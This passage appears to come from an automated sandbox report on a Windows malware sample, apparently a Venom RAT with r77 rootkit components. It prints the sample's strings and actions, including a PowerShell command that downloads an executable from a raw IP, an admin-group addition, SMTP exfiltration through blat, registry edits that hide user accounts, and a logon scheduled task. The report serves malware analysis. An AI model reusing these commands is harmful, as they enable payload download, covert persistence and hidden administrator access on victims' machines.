      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_01
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeMutant created: \Sessions\1\BaseNamedObjects\VNM_MUTEX_yidaALoSEROfTPWHwX
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4884:120:WilError_01
      Source: JeCXrQSehB.exeString found in binary or memory: /addC/c net localgroup administrators eabcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNOPQRSTUVWXYZsSoftware\Microsoft\Windows\CurrentVersion\Policies\System
      Source: JeCXrQSehB.exeString found in binary or memory: blat.exe9 -install smtp.gmail.com -u
      Source: JeCXrQSehB.exeString found in binary or memory: powershell (new-object System.Net.WebClient).DownloadFile('http://91.134.207.16/Install.exe','%exeFile%');
      Source: JeCXrQSehB.exeString found in binary or memory: $77-Install.exe+$77-Nvidia-Update.exe
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: JeCXrQSehB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: JeCXrQSehB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdbT0n0 `0_CorExeMainmscoree.dll source: JeCXrQSehB.exe, Client.exe.0.dr
      Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdbMCgC YC_CorExeMainmscoree.dll source: JeCXrQSehB.exe, Client.exe.0.dr
      Source: Binary string: F:\coding\r77-rootkit-master\Install\obj\Debug\Install.pdb source: JeCXrQSehB.exe, Client.exe.0.dr
      Source: Binary string: D:\CopyMySelf\obj\Release\Chrome.pdb source: JeCXrQSehB.exe, Client.exe.0.dr
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeFile created: C:\Users\user\AppData\Roaming\UPX\Client.exeJump to dropped file

      Boot Survival

      barindex
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\JeCXrQSehB.exe" /rl HIGHEST /f

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: JeCXrQSehB.exe, 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
      Source: JeCXrQSehB.exe, 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: 7New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Durios -PropertyType DWord -Value 0 -Force
      Source: JeCXrQSehB.exe, 00000000.00000000.243030061.0000000000042000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: 5New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Venom -PropertyType DWord -Value 0 -Force
      Source: JeCXrQSehB.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
      Source: JeCXrQSehB.exeString found in binary or memory: 7New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Durios -PropertyType DWord -Value 0 -Force
      Source: JeCXrQSehB.exeString found in binary or memory: 5New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Venom -PropertyType DWord -Value 0 -Force
      Source: Client.exe.0.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
      Source: Client.exe.0.drString found in binary or memory: 7New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Durios -PropertyType DWord -Value 0 -Force
      Source: Client.exe.0.drString found in binary or memory: 5New-ItemProperty -Path HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList -Name Venom -PropertyType DWord -Value 0 -Force
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeFile opened: C:\Users\user\Desktop\JeCXrQSehB.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeFile opened: C:\Users\user\AppData\Roaming\UPX\Client.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeFile opened: C:\Users\user\AppData\Roaming\UPX\Client.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\JeCXrQSehB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\UPX\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
